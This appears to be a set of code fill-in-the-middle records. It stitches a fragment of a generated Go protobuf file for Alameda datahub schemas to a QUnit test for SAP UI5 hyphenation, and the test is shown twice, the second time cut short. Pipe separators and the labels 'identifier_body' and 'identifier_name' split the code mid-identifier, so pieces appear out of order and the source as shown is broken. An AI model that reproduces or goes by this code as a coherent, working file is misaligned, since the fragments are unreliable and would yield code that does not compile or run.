func (m *SchemaMeta) XXX_Size() int {
return xxx_messageInfo_SchemaMeta.Size(m)
}
func (m *SchemaMeta) XXX_DiscardUnknown() {
xxx_messageInfo_SchemaMeta.DiscardUnknown(m)
}
var xxx_messageInfo_SchemaMeta proto.InternalMessageInfo
func (m *SchemaMeta) GetTable() Table {
if m != nil {
return m.Table
}
return Table_TABLE_UNDEFINED
}
func (m *SchemaMeta) GetScope() Scope {
if m != nil {
return m.Scope
}
return Scope_SCOPE_UNDEFINED
}
func (m *SchemaMeta) GetCategory() string |
func (m *SchemaMeta) GetType() string {
if m != nil {
return m.Type
}
return ""
}
type Mesaurement struct {
Name string `protobuf:"bytes,1,opt,name=name,proto3" json:"name,omitempty"`
MetricType common.MetricType `protobuf:"varint,2,opt,name=metric_type,json=metricType,proto3,enum=containersai.alameda.v1alpha1.datahub.common.MetricType" json:"metric_type,omitempty"`
Columns []*Column `protobuf:"bytes,3,rep,name=columns,proto3" json:"columns,omitempty"`
XXX_NoUnkeyedLiteral struct{} `json:"-"`
XXX_unrecognized []byte `json:"-"`
XXX_sizecache int32 `json:"-"`
}
func (m *Mesaurement) Reset() { *m = Mesaurement{} }
func (m *Mesaurement) String() string { return proto.CompactTextString(m) }
func (*Mesaurement) ProtoMessage() {}
func (*Mesaurement) Descriptor() ([]byte, []int) {
return fileDescriptor_01194bf23370964f, []int{1}
}
func (m *Mesaurement) XXX_Unmarshal(b []byte) error {
return xxx_messageInfo_Mesaurement.Unmarshal(m, b)
}
func (m *Mesaurement) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {
return xxx_messageInfo_Mesaurement.Marshal(b, m, deterministic)
}
func (m *Mesaurement) XXX_Merge(src proto.Message) {
xxx_messageInfo_Mesaurement.Merge(m, src)
}
func (m *Mesaurement) XXX_Size() int {
return xxx_messageInfo_Mesaurement.Size(m)
}
func (m *Mesaurement) XXX_DiscardUnknown() {
xxx_messageInfo_Mesaurement.DiscardUnknown(m)
}
var xxx_messageInfo_Mesaurement proto.InternalMessageInfo
func (m *Mesaurement) GetName() string {
if m != nil {
return m.Name
}
return ""
}
func (m *Mesaurement) GetMetricType() common.MetricType {
if m != nil {
return m.MetricType
}
return common.MetricType_METRICS_TYPE_UNDEFINED
}
func (m *Mesaurement) GetColumns() []*Column {
if m != nil {
return m.Columns
}
return nil
}
type Column struct {
Name string `protobuf:"bytes,1,opt,name=name,proto3" json:"name,omitempty"`
Required bool `protobuf:"varint,2,opt,name=required,proto3" json:"required,omitempty"`
ColumnTypes common1.ColumnType `protobuf:"varint,3,opt,name=column_types,json=columnTypes,proto3,enum=containersai.common.ColumnType" json:"column_types,omitempty"`
DataTypes common1.DataType `protobuf:"varint,4,opt,name=data_types,json=dataTypes,proto3,enum=containersai.common.DataType" json:"data_types,omitempty"`
XXX_NoUnkeyedLiteral struct{} `json:"-"`
XXX_unrecognized []byte `json:"-"`
XXX_sizecache int32 `json:"-"`
}
func (m *Column) Reset() { *m = Column{} }
func (m *Column) String() string { return proto.CompactTextString(m) }
func (*Column) ProtoMessage() {}
func (*Column) Descriptor() ([]byte, []int) {
return fileDescriptor_01194bf23370964f, []int{2}
}
func (m *Column) XXX_Unmarshal(b []byte) error {
return xxx_messageInfo_Column.Unmarshal(m, b)
}
func (m *Column) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {
return xxx_messageInfo_Column.Marshal(b, m, deterministic)
}
func (m *Column) XXX_Merge(src proto.Message) {
xxx_messageInfo_Column.Merge(m, src)
}
func (m *Column) XXX_Size() int {
return xxx_messageInfo_Column.Size(m)
}
func (m *Column) XXX_DiscardUnknown() {
xxx_messageInfo_Column.DiscardUnknown(m)
}
var xxx_messageInfo_Column proto.InternalMessageInfo
func (m *Column) GetName() string {
if m != nil {
return m.Name
}
return ""
}
func (m *Column) GetRequired() bool {
if m != nil {
return m.Required
}
return false
}
func (m *Column) GetColumnTypes() common1.ColumnType {
if m != nil {
return m.ColumnTypes
}
return common1.ColumnType_COLUMNTYPE_UDEFINED
}
func (m *Column) GetDataTypes() common1.DataType {
if m != nil {
return m.DataTypes
}
return common1.DataType_DATATYPE_UNDEFINED
}
func init() {
proto.RegisterEnum("containersai.alameda.v1alpha1.datahub.schemas.Table", Table_name, Table_value)
proto.RegisterEnum("containersai.alameda.v1alpha1.datahub.schemas.Scope", Scope_name, Scope_value)
proto.RegisterType((*SchemaMeta)(nil), "containersai.alameda.v1alpha1.datahub.schemas.SchemaMeta")
proto.RegisterType((*Mesaurement)(nil), "containersai.alameda.v1alpha1.datahub.schemas.Mesaurement")
proto.RegisterType((*Column)(nil), "containersai.alameda.v1alpha1.datahub.schemas.Column")
}
func init() {
proto.RegisterFile("alameda_api/v1alpha1/datahub/schemas/types.proto", fileDescriptor_01194bf23370964f)
}
var fileDescriptor_01194bf23370964f = []byte{
// 522 bytes of a gzipped FileDescriptorProto
0x1f, 0x8b, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0xff, 0x9c, 0x54, 0xcd, 0x6a, 0xdb, 0x4c,
0x14, 0xfd, 0xe4, 0xbf, 0xcf, 0xbe, 0x0e, 0xae, 0x3a, 0x4d, 0x41, 0x18, 0x4a, 0x8d, 0x57, 0x26,
0x10, 0xa9, 0x76, 0x5b, 0xe8, 0xa2, 0x1b, 0x5b, 0x56, 0x83, 0x8a, 0x25, 0x99, 0xb1, 0xb2, 0x68,
0x37, 0x66, 0x2c, 0x0f, 0xb1, 0xc0, 0xfa, 0xa9, 0x66, 0x5c, 0xf0, 0xc3, 0xf4, 0x45, 0xfa, 0x0e,
0xdd, 0xf5, 0x81, 0x8a, 0x66, 0xc6, 0x4a, 0x02, 0xa1, 0x24, 0xdd, 0xdd, 0x39, 0xcc, 0x39, 0xf7,
0x9c, 0xcb, 0x9d, 0x81, 0x37, 0x64, 0x4f, 0x12, 0xba, 0x25, 0x6b, 0x92, 0xc7, 0xd6, 0xf7, 0x31,
0xd9, 0xe7, 0x3b, 0x32, 0xb6, 0xb6, 0x84, 0x93, 0xdd, 0x61, 0x63, 0xb1, 0x68, 0x47, 0x13, 0xc2,
0x2c, 0x7e, 0xcc, 0x29, 0x33, 0xf3, 0x22, 0xe3, 0x19, 0xba, 0x8c, 0xb2, 0x94, 0x93, 0x38, 0xa5,
0x05, 0x23, 0xb1, 0xa9, 0xe8, 0xe6, 0x89, 0x6a, 0x2a, 0xaa, 0xa9, 0xa8, 0xfd, 0xf1, 0x5f, 0x1b,
0x44, 0x59, 0x92, 0x64, 0xa9, 0x95, 0x50, 0x5e, 0xc4, 0x91, 0xea, 0xd0, 0x47, 0x0a, 0xbd, 0xd3,
0x75, 0xf8, 0x5b, 0x03, 0x58, 0x09, 0x49, 0x8f, 0x72, 0x82, 0x3e, 0x43, 0x93, 0x93, 0xcd, 0x9e,
0x1a, 0xda, 0x40, 0x1b, 0xf5, 0x26, 0xef, 0xcc, 0x27, 0x99, 0x32, 0xc3, 0x92, 0x8b, 0xa5, 0x44,
0xa9, 0xc5, 0xa2, 0x2c, 0xa7, 0x46, 0xed, 0x9f, 0xb4, 0x56, 0x25, 0x17, 0x4b, 0x09, 0xd4, 0x87,
0x76, 0x44, 0x38, 0xbd, 0xc9, 0x8a, 0xa3, 0x51, 0x1f, 0x68, 0xa3, 0x0e, 0xae, 0xce, 0x08, 0x41,
0xa3, 0x4c, 0x64, 0x34, 0x04, 0x2e, 0xea, 0xe1, 0x2f, 0x0d, 0xba, 0x1e, 0x65, 0xe4, 0x50, 0xd0,
0x84, 0xa6, 0xbc, 0xbc, 0x93, 0x92, 0x44, 0xc6, 0xea, 0x60, 0x51, 0xa3, 0x2f, 0xd0, 0x95, 0xf3,
0x59, 0x0b, 0xba, 0x74, 0xf9, 0xe1, 0x91, 0x2e, 0xe5, 0x28, 0x4d, 0x4f, 0x08, 0x84, 0xc7, 0x9c,
0x62, 0x48, 0xaa, 0x1a, 0x05, 0xf0, 0x7f, 0x94, 0xed, 0x0f, 0x49, 0xca, 0x8c, 0xfa, 0xa0, 0x3e,
0xea, 0x4e, 0xde, 0x3f, 0x31, 0xbc, 0x2d, 0xd8, 0xf8, 0xa4, 0x32, 0xfc, 0xa9, 0x41, 0x4b, 0x62,
0x0f, 0x46, 0xe9, 0x43, 0xbb, 0xa0, 0xdf, 0x0e, 0x71, 0x41, 0xb7, 0x22, 0x47, 0x1b, 0x57, 0x67,
0x34, 0x83, 0x33, 0xa9, 0x22, 0x62, 0x32, 0x31, 0xbe, 0xde, 0xe4, 0xf5, 0x7d, 0x43, 0x2a, 0x8e,
0x6c, 0x21, 0xe2, 0x74, 0xa3, 0xaa, 0x66, 0xe8, 0x23, 0x40, 0xe9, 0x50, 0x29, 0x34, 0x84, 0xc2,
0xab, 0x07, 0x15, 0xe6, 0x84, 0x13, 0xc1, 0xef, 0x6c, 0x55, 0xc5, 0x2e, 0x7e, 0x68, 0xd0, 0x14,
0x9b, 0x81, 0x5e, 0xc0, 0xb3, 0x70, 0x3a, 0x5b, 0x38, 0xeb, 0x6b, 0x7f, 0xee, 0x7c, 0x72, 0x7d,
0x67, 0xae, 0xff, 0x87, 0x5e, 0xc2, 0x73, 0x09, 0x4e, 0x97, 0xcb, 0x85, 0x6b, 0x4f, 0x43, 0x37,
0xf0, 0x75, 0x0d, 0xe9, 0x70, 0x26, 0x61, 0xcf, 0x09, 0xb1, 0x6b, 0xeb, 0x35, 0x84, 0xa0, 0x27,
0x91, 0xe5, 0x62, 0xea, 0xfb, 0xae, 0x7f, 0xa5, 0xd7, 0xd1, 0x39, 0xe8, 0x0a, 0xc3, 0xce, 0xdc,
0xb5, 0x05, 0xb7, 0x71, 0x7b, 0x13, 0x3b, 0xab, 0xe0, 0x1a, 0xdb, 0x8e, 0xde, 0x44, 0x06, 0x9c,
0x9f, 0x30, 0x3b, 0xf0, 0x3c, 0xc7, 0x9f, 0xcb, 0x4e, 0xad, 0x8b, 0x2b, 0x68, 0x8a, 0x65, 0x2b,
0xed, 0xad, 0xec, 0x60, 0x79, 0xdf, 0x1e, 0x82, 0x9e, 0x04, 0x2b, 0x2d, 0xad, 0xb4, 0x2c, 0xb1,
0xbb, 0x96, 0x6b, 0x33, 0xfb, 0xeb, 0xf4, 0x26, 0xe6, 0x6a, 0x3d, 0xac, 0xdb, 0xf1, 0x5c, 0x92,
0xd8, 0x2a, 0x9f, 0xe9, 0x63, 0xfe, 0x84, 0x4d, 0x4b, 0x3c, 0xcc, 0xb7, 0x7f, 0x02, 0x00, 0x00,
0xff, 0xff, 0xcd, 0x69, 0x6a, 0x34, 0x42, 0x04, 0x00, 0x00,
}
| {
if m != nil {
return m.Category
}
return ""
} | identifier_body |
Hyphenation.qunit.js | /*global QUnit, sinon */
sap.ui.define("sap/ui/core/qunit/Hyphenation.qunit", [
"sap/ui/core/hyphenation/Hyphenation",
"sap/ui/core/hyphenation/HyphenationTestingWords",
"sap/ui/dom/includeScript",
"sap/base/Log",
"sap/ui/Device",
"sap/ui/qunit/utils/createAndAppendDiv",
"sap/ui/core/Configuration"
], function(
Hyphenation,
HyphenationTestingWords,
includeScript,
Log,
Device,
createAndAppendDiv,
Configuration
) {
"use strict";
var sSingleLangTest = "de",
aSupportedLanguages = [
"bg",
"ca",
"hr",
"da",
"nl",
"en",
"et",
"fi",
"fr",
"de",
"el",
"hi",
"hu",
"it",
"lt",
"no",
"pt",
"ru",
"sl",
"es",
"sv",
"th",
"tr",
"uk"
],
aLanguagesWithNoThirdParty = [
"cs", "pl", "sr"
],
aNotSupportedLanguages = [
"mn", "vi", "test-lang"
],
mWords = {
// lang: [not hyphenated, hyphenated]
"bg": ["непротивоконституционствувателствувайте", "неп\u00ADро\u00ADти\u00ADво\u00ADкон\u00ADс\u00ADти\u00ADту\u00ADци\u00ADон\u00ADс\u00ADт\u00ADву\u00ADва\u00ADтел\u00ADс\u00ADт\u00ADву\u00ADвайте"],
"ca": ["Psiconeuroimmunoendocrinologia", "Psi\u00ADco\u00ADneu\u00ADroim\u00ADmu\u00ADno\u00ADen\u00ADdo\u00ADcri\u00ADno\u00ADlo\u00ADgia"],
"hr": ["prijestolonasljednikovičičinima", "pri\u00ADjes\u00ADto\u00ADlo\u00ADna\u00ADs\u00ADljed\u00ADni\u00ADko\u00ADvi\u00ADči\u00ADči\u00ADnima"],
"da": ["Gedebukkebensoverogundergeneralkrigskommander", "Gede\u00ADbuk\u00ADke\u00ADben\u00ADsoverogun\u00ADder\u00ADge\u00ADne\u00ADral\u00ADkrigskom\u00ADman\u00ADder"], // original word was Gedebukkebensoverogundergeneralkrigskommandersergenten
"nl": ["meervoudigepersoonlijkheidsstoornissen", "meer\u00ADvou\u00ADdi\u00ADge\u00ADper\u00ADsoon\u00ADlijk\u00ADheids\u00ADstoor\u00ADnis\u00ADsen"],
"en": ["pneumonoultramicroscopicsilicovolcanoconiosis", "pneu\u00ADmo\u00ADnoul\u00ADtra\u00ADmi\u00ADcro\u00ADscop\u00ADic\u00ADsil\u00ADi\u00ADco\u00ADvol\u00ADcanoco\u00ADnio\u00ADsis"],
"en-gb": ["pneumonoultramicroscopicsilicovolcanoconiosis", "pneu\u00ADmo\u00ADnoul\u00ADtra\u00ADmi\u00ADcro\u00ADscop\u00ADic\u00ADsil\u00ADi\u00ADco\u00ADvol\u00ADcanoco\u00ADnio\u00ADsis"],
"en-us": ["pneumonoultramicroscopicsilicovolcanoconiosis", "pneu\u00ADmo\u00ADnoul\u00ADtra\u00ADmi\u00ADcro\u00ADscop\u00ADic\u00ADsil\u00ADi\u00ADco\u00ADvol\u00ADcanoco\u00ADnio\u00ADsis"],
"et": ["Sünnipäevanädalalõpupeopärastlõunaväsimus", "Sün\u00ADni\u00ADpäe\u00ADva\u00ADnä\u00ADda\u00ADla\u00ADlõ\u00ADpu\u00ADpeo\u00ADpä\u00ADrast\u00ADlõu\u00ADna\u00ADvä\u00ADsi\u00ADmus"],
"fi": ["kolmivaihekilowattituntimittari", "kolmivaihekilowattituntimittari"],
"fr": ["hippopotomonstrosesquippedaliophobie", "hip\u00ADpo\u00ADpo\u00ADto\u00ADmons\u00ADtro\u00ADses\u00ADquip\u00ADpe\u00ADda\u00ADlio\u00ADpho\u00ADbie"],
"de": ["Kindercarnavalsoptochtvoorbereidingswerkzaamheden", "Kin\u00ADder\u00ADcar\u00ADna\u00ADvals\u00ADop\u00ADtocht\u00ADvo\u00ADor\u00ADberei\u00ADdings\u00ADwerk\u00ADzaam\u00ADhe\u00ADden"], // original word was Kindercarnavalsoptochtvoorbereidingswerkzaamhedenplan
"de-at": ["Kindercarnavalsoptochtvoorbereidingswerkzaamheden", "Kin\u00ADder\u00ADcar\u00ADna\u00ADvals\u00ADop\u00ADtocht\u00ADvo\u00ADor\u00ADberei\u00ADdings\u00ADwerk\u00ADzaam\u00ADhe\u00ADden"],
"el": ["ηλεκτροεγκεφαλογράφημα", "ηλε\u00ADκτρο\u00ADε\u00ADγκε\u00ADφα\u00ADλο\u00ADγρά\u00ADφημα"],
"hi": ["किंकर्तव्यविमूढ़", "किं\u00ADक\u00ADर्त\u00ADव्य\u00ADवि\u00ADमूढ़"],
"hu": ["Megszentségteleníthetetlenségeskedéseitekért", "Meg\u00ADszent\u00ADség\u00ADte\u00ADle\u00ADnít\u00ADhe\u00ADtet\u00ADlen\u00ADsé\u00ADges\u00ADke\u00ADdé\u00ADse\u00ADi\u00ADte\u00ADkért"],
"it": ["hippopotomonstrosesquippedaliofobia", "hip\u00ADpo\u00ADpo\u00ADto\u00ADmon\u00ADstro\u00ADse\u00ADsquip\u00ADpe\u00ADda\u00ADlio\u00ADfo\u00ADbia"],
"lt": ["nebeprisikiškiakopūstlapiaujančiuosiuose", "nebe\u00ADpri\u00ADsi\u00ADkiš\u00ADkia\u00ADko\u00ADpūst\u00ADla\u00ADpiau\u00ADjan\u00ADčiuo\u00ADsiuose"],
"no": ["Omtrentlig", "Omtrent\u00ADlig"],
"pt": ["pneumoultramicroscopicossilicovulcanoconiose", "pneu\u00ADmoul\u00ADtra\u00ADmi\u00ADcros\u00ADco\u00ADpi\u00ADcos\u00ADsi\u00ADli\u00ADco\u00ADvul\u00ADca\u00ADno\u00ADco\u00ADni\u00ADose"],
"ru": ["превысокомногорассмотрительствующий", "пре\u00ADвы\u00ADсо\u00ADком\u00ADно\u00ADго\u00ADрас\u00ADсмот\u00ADри\u00ADтель\u00ADству\u00ADю\u00ADщий"],
"sl": ["Dialektičnomaterialističen", "Dia\u00ADlek\u00ADtič\u00ADno\u00ADma\u00ADte\u00ADri\u00ADa\u00ADli\u00ADsti\u00ADčen"],
"es": ["Electroencefalografistas", "Elec\u00ADtro\u00ADen\u00ADce\u00ADfa\u00ADlo\u00ADgra\u00ADfis\u00ADtas"],
"sv": ["Realisationsvinstbeskattning", "Rea\u00ADli\u00ADsa\u00ADtions\u00ADvinst\u00ADbe\u00ADskatt\u00ADning"],
"th": ["ตัวอย่างข้อความที่จะใช้ใน", "ตัว\u00ADอย่าง\u00ADข้อ\u00ADความ\u00ADที่จะ\u00ADใช้ใน"],
"tr": ["Muvaffakiyetsizleştiricileştiriveremeyebileceklerimizdenmişsinizcesine", "Muvaffakiyetsizleştiricileştiriveremeyebileceklerimizdenmişsinizcesine"],
"uk": ["Нікотинамідаденіндинуклеотидфосфат", "Ніко\u00ADти\u00ADна\u00ADмі\u00ADда\u00ADде\u00ADнін\u00ADди\u00ADну\u00ADкле\u00ADо\u00ADтид\u00ADфо\u00ADсфат"]
},
mCompoundWords = {
"en": ["factory-made", "fac\u00ADtory-\u200bmade"],
"de": ["Geheimzahl-Aufschreiber", "Geheim\u00ADzahl-\u200bAuf\u00ADschrei\u00ADber"]
},
mTexts = {
// lang: [not hyphenated, hyphenated]
"en": [
"A hyphenation algorithm is a set of rules that decides at which points a word can be broken over two lines with a hyphen.",
"A hyphen\u00ADation algo\u00ADrithm is a set of rules that decides at which points a word can be bro\u00ADken over two lines with a hyphen."
],
"de": [
"Die Worttrennung, auch Silbentrennung genannt, bezeichnet in der Orthographie die Art und Weise, wie die Wörter insbesondere am Zeilenende getrennt werden können.",
"Die Wort\u00ADtren\u00ADnung, auch Sil\u00ADben\u00ADtren\u00ADnung genannt, bezeich\u00ADnet in der Ortho\u00ADgra\u00ADphie die Art und Weise, wie die Wör\u00ADter ins\u00ADbe\u00ADson\u00ADdere am Zei\u00ADlen\u00ADende getrennt wer\u00ADden kön\u00ADnen."
],
"ru": [
"Пример текста, который будет служить для проверки перевода.",
"При\u00ADмер тек\u00ADста, кото\u00ADрый будет слу\u00ADжить для про\u00ADверки пере\u00ADвода."
]
};
function getDefaultLang() {
var oLocale = Configuration.getLocale(),
sLanguage = oLocale.getLanguage().toLowerCase();
return sLanguage;
}
var oTestDiv = createAndAppendDiv('tst1');
oTestDiv.style.cssText = [
"-moz-hyphens:auto;",
"-webkit-hyphens:auto;",
"hyphens:auto;",
"width:48px;",
"font-size:12px;",
"line-height:12px;",
"border:none;",
"padding:0;",
"word-wrap:normal"
].join("");
function canUseNativeHyphenationRaw() {
var sLanguageOnThePage = document.documentElement.getAttribute("lang").toLowerCase();
var sMappedLanguage = Configur | e().getLanguage().toLowerCase();
// adjustment of the language to correspond to Hyphenopoly pattern files (.hpb files)
switch (sMappedLanguage) {
case "en":
sMappedLanguage = "en-us";
break;
case "nb":
sMappedLanguage = "nb-no";
break;
case "no":
sMappedLanguage = "nb-no";
break;
case "el":
sMappedLanguage = "el-monoton";
break;
default:
break;
}
// we don't have a word to test for this language
if (!HyphenationTestingWords[sMappedLanguage]) {
return false;
}
oTestDiv.lang = sLanguageOnThePage;
oTestDiv.innerText = HyphenationTestingWords[sMappedLanguage];
// Chrome on macOS partially supported native hyphenation. It didn't hyphenate one word more than once.
if (Device.os.macintosh && Device.browser.chrome) {
return oTestDiv.offsetHeight > 24; // check if word is hyphenated more than once
}
return oTestDiv.offsetHeight > 12;
}
QUnit.module("Instance");
QUnit.test("create instance", function(assert) {
var oHyphenation = Hyphenation.getInstance();
assert.ok(oHyphenation, "instance is created");
assert.strictEqual(oHyphenation.isA("sap.ui.core.hyphenation.Hyphenation"), true, "instance is correct");
});
QUnit.module("Initialization", {
before: function () {
this.oHyphenation = Hyphenation.getInstance();
}
});
QUnit.test("default initialize", function(assert) {
assert.expect(1);
var done = assert.async();
this.oHyphenation.initialize().then(function() {
var sDefaultLang = getDefaultLang();
assert.strictEqual(this.oHyphenation.isLanguageInitialized(sDefaultLang), true, "default lang '" + sDefaultLang + "' was initialized");
done();
}.bind(this));
});
QUnit.test("initialize only single language - " + sSingleLangTest, function(assert) {
assert.expect(2);
var done = assert.async();
this.oHyphenation.initialize(sSingleLangTest).then(function() {
assert.strictEqual(this.oHyphenation.isLanguageInitialized(sSingleLangTest), true, "hyphenation api is initialized with language - " + sSingleLangTest);
assert.ok(this.oHyphenation.getInitializedLanguages().indexOf(sSingleLangTest) > -1, "list of initialized languages contains " + sSingleLangTest);
done();
}.bind(this)).catch(function(e) {
assert.ok(false, e);
});
});
// WebAssembly is not supported in all browsers.
if (window.WebAssembly) {
QUnit.test("Multiple initialization calls", function(assert) {
// Arrange
var done = assert.async();
var iForcedInitializations = 300;
var oSpy = this.spy(window.WebAssembly, "instantiate");
// Initialize the default language and after that try to force multiple initializations.
this.oHyphenation.initialize().then(function() {
oSpy.resetHistory();
var aPromises = [];
// Act
for (var i = 0; i < iForcedInitializations; i++) {
aPromises.push(new Promise(function (resolve) {
this.oHyphenation.initialize()
.then(resolve)
.catch(resolve);
}.bind(this)));
}
Promise.all(aPromises).then(function () {
// Assert
assert.ok(oSpy.notCalled, "Should only initialize once to avoid browser out of memory exceptions.");
// Clean up
oSpy.restore();
done();
});
}.bind(this));
});
}
QUnit.test("is language supported", function(assert) {
var that = this;
aSupportedLanguages.forEach(function(sLang) {
assert.strictEqual(that.oHyphenation.isLanguageSupported(sLang), true, sLang + " is supported");
});
aNotSupportedLanguages.forEach(function(sLang) {
assert.strictEqual(that.oHyphenation.isLanguageSupported(sLang), false, sLang + " is not supported");
});
});
QUnit.test("initialize all supported languages", function(assert) {
assert.expect(aSupportedLanguages.length + 1);
var done = assert.async(),
that = this,
counter = 0;
aSupportedLanguages.forEach(function(sLang) {
that.oHyphenation.initialize(sLang).then(function() {
counter++;
assert.strictEqual(that.oHyphenation.isLanguageInitialized(sLang), true, sLang + " is initialized");
if (counter >= aSupportedLanguages.length) {
assert.strictEqual(that.oHyphenation.getInitializedLanguages().length, aSupportedLanguages.length, "all languages are initialized");
done();
}
}).catch(function(e) {
assert.ok(false, e);
});
});
});
QUnit.test("fail to initialize not supported languages", function(assert) {
assert.expect(aNotSupportedLanguages.length * 2);
var done = assert.async(),
that = this,
counter = 0;
aNotSupportedLanguages.forEach(function(sLang) {
assert.strictEqual(that.oHyphenation.isLanguageInitialized(sLang), false, sLang + " is by default not initialized");
that.oHyphenation.initialize(sLang).then(function() {
assert.ok(false, "not supported language '" + sLang + "' was initialized");
}).catch(function(e) {
counter++;
assert.ok(true, sLang + " is not supported");
if (counter === aNotSupportedLanguages.length) {
done();
}
});
});
});
QUnit.module("Hyphenation", {
before : function () {
this.oHyphenation = Hyphenation.getInstance();
}
});
QUnit.test("can use third party hyphenation", function(assert) {
var that = this;
aSupportedLanguages.forEach(function(sLang) {
assert.strictEqual(that.oHyphenation.canUseThirdPartyHyphenation(sLang), true, sLang + " is supported");
});
aLanguagesWithNoThirdParty.forEach(function(sLang) {
assert.strictEqual(that.oHyphenation.canUseThirdPartyHyphenation(sLang), false, sLang + " is not supported");
});
});
QUnit.test("can use native hyphenation", function(assert) {
assert.strictEqual(canUseNativeHyphenationRaw(), this.oHyphenation.canUseNativeHyphenation(), "The Hyphenation instance should give the same result as the raw check.");
});
QUnit.test("hyphenate example words", function(assert) {
var done = assert.async(),
that = this,
counter = 0,
aLanguages = Object.keys(mWords);
assert.expect(aLanguages.length + Object.keys(mCompoundWords).length);
aLanguages.forEach(function(sLang) {
that.oHyphenation.initialize(sLang).then(function() {
counter++;
assert.strictEqual(
that.oHyphenation.hyphenate(mWords[sLang][0], sLang),
mWords[sLang][1],
"hyphenation of example word for '" + sLang + "' is ok"
);
if (mCompoundWords.hasOwnProperty(sLang)) {
assert.strictEqual(
that.oHyphenation.hyphenate(mCompoundWords[sLang][0], sLang),
mCompoundWords[sLang][1],
"compound word hyphenation for '" + sLang + "' is ok"
);
}
if (counter === aLanguages.length) {
done();
}
});
});
});
QUnit.test("hyphenate example texts", function(assert) {
var done = assert.async(),
that = this,
counter = 0,
aLanguages = Object.keys(mTexts);
assert.expect(aLanguages.length);
aLanguages.forEach(function(sLang) {
that.oHyphenation.initialize(sLang).then(function() {
counter++;
assert.strictEqual(
that.oHyphenation.hyphenate(mTexts[sLang][0], sLang),
mTexts[sLang][1],
"hyphenation of example text for '" + sLang + "' is ok"
);
if (counter === aLanguages.length) {
done();
}
});
});
});
QUnit.test("fail to hyphenate with not initialized language", function(assert) {
var oErrorLogSpy = this.spy(Log, "error"),
onError = function() {
assert.ok(true, "error event was thrown");
};
this.oHyphenation.attachEvent("error", onError);
assert.strictEqual(this.oHyphenation.hyphenate("Lorem ipsum", "test-lang"), "Lorem ipsum", "hyphenate of uninitialized lang returns the same text without changes");
assert.ok(oErrorLogSpy.calledOnce, "an error was logged");
Log.error.restore();
this.oHyphenation.detachEvent("error", onError);
});
QUnit.module("Hyphenopoly_Loader and Hyphenopoly.js overrides");
QUnit.test("No credentials are sent when request is made", function (assert) {
// Arrange
var done = assert.async();
var oFetchSpy = sinon.spy(window, "fetch");
window.Hyphenopoly = {
require: {
"en-us": "FORCEHYPHENOPOLY"
},
setup: {
keepAlive: false,
hide: "DONT_HIDE"
},
handleEvent: {
error: function () {
// Assert
assert.notOk(
oFetchSpy.calledWith(sinon.match.any, { credentials: "include" }),
"Credentials must NOT be included in the request"
);
// Clean up
oFetchSpy.restore();
},
hyphenopolyEnd: function () {
done();
}
}
};
// Act
includeScript({
url: sap.ui.require.toUrl("sap/ui/thirdparty/hyphenopoly/Hyphenopoly_Loader.js")
});
});
QUnit.test("Auto fallback to asm.js when wasm is not allowed", function (assert) {
// Arrange
var done = assert.async();
var oWasmInstanceStub = sinon.stub(WebAssembly, "Instance").throws("WebAssembly can't be used due to CSP restrictions.");
window.Hyphenopoly = {
require: {
"en-us": "FORCEHYPHENOPOLY"
},
setup: {
keepAlive: false,
hide: "DONT_HIDE"
},
handleEvent: {
engineReady: function (e) {
// Assert
assert.strictEqual(window.Hyphenopoly.cf.wasm, false);
// Clean up
oWasmInstanceStub.restore();
},
hyphenopolyEnd: function () {
done();
}
}
};
// Act
includeScript({
url: sap.ui.require.toUrl("sap/ui/thirdparty/hyphenopoly/Hyphenopoly_Loader.js")
});
});
});
| ation.getLocal | identifier_name |
Hyphenation.qunit.js | /*global QUnit, sinon */
sap.ui.define("sap/ui/core/qunit/Hyphenation.qunit", [
"sap/ui/core/hyphenation/Hyphenation",
"sap/ui/core/hyphenation/HyphenationTestingWords",
"sap/ui/dom/includeScript",
"sap/base/Log",
"sap/ui/Device",
"sap/ui/qunit/utils/createAndAppendDiv",
"sap/ui/core/Configuration"
], function(
Hyphenation,
HyphenationTestingWords,
includeScript,
Log,
Device,
createAndAppendDiv,
Configuration
) {
"use strict";
var sSingleLangTest = "de",
aSupportedLanguages = [
"bg",
"ca",
"hr",
"da",
"nl",
"en",
"et",
"fi",
"fr",
"de",
"el",
"hi",
"hu",
"it",
"lt",
"no",
"pt",
"ru",
"sl",
"es",
"sv",
"th",
"tr",
"uk"
],
aLanguagesWithNoThirdParty = [
"cs", "pl", "sr"
],
aNotSupportedLanguages = [
"mn", "vi", "test-lang"
],
mWords = {
// lang: [not hyphenated, hyphenated]
"bg": ["непротивоконституционствувателствувайте", "неп\u00ADро\u00ADти\u00ADво\u00ADкон\u00ADс\u00ADти\u00ADту\u00ADци\u00ADон\u00ADс\u00ADт\u00ADву\u00ADва\u00ADтел\u00ADс\u00ADт\u00ADву\u00ADвайте"],
"ca": ["Psiconeuroimmunoendocrinologia", "Psi\u00ADco\u00ADneu\u00ADroim\u00ADmu\u00ADno\u00ADen\u00ADdo\u00ADcri\u00ADno\u00ADlo\u00ADgia"],
"hr": ["prijestolonasljednikovičičinima", "pri\u00ADjes\u00ADto\u00ADlo\u00ADna\u00ADs\u00ADljed\u00ADni\u00ADko\u00ADvi\u00ADči\u00ADči\u00ADnima"],
"da": ["Gedebukkebensoverogundergeneralkrigskommander", "Gede\u00ADbuk\u00ADke\u00ADben\u00ADsoverogun\u00ADder\u00ADge\u00ADne\u00ADral\u00ADkrigskom\u00ADman\u00ADder"], // original word was Gedebukkebensoverogundergeneralkrigskommandersergenten
"nl": ["meervoudigepersoonlijkheidsstoornissen", "meer\u00ADvou\u00ADdi\u00ADge\u00ADper\u00ADsoon\u00ADlijk\u00ADheids\u00ADstoor\u00ADnis\u00ADsen"],
"en": ["pneumonoultramicroscopicsilicovolcanoconiosis", "pneu\u00ADmo\u00ADnoul\u00ADtra\u00ADmi\u00ADcro\u00ADscop\u00ADic\u00ADsil\u00ADi\u00ADco\u00ADvol\u00ADcanoco\u00ADnio\u00ADsis"],
"en-gb": ["pneumonoultramicroscopicsilicovolcanoconiosis", "pneu\u00ADmo\u00ADnoul\u00ADtra\u00ADmi\u00ADcro\u00ADscop\u00ADic\u00ADsil\u00ADi\u00ADco\u00ADvol\u00ADcanoco\u00ADnio\u00ADsis"],
"en-us": ["pneumonoultramicroscopicsilicovolcanoconiosis", "pneu\u00ADmo\u00ADnoul\u00ADtra\u00ADmi\u00ADcro\u00ADscop\u00ADic\u00ADsil\u00ADi\u00ADco\u00ADvol\u00ADcanoco\u00ADnio\u00ADsis"],
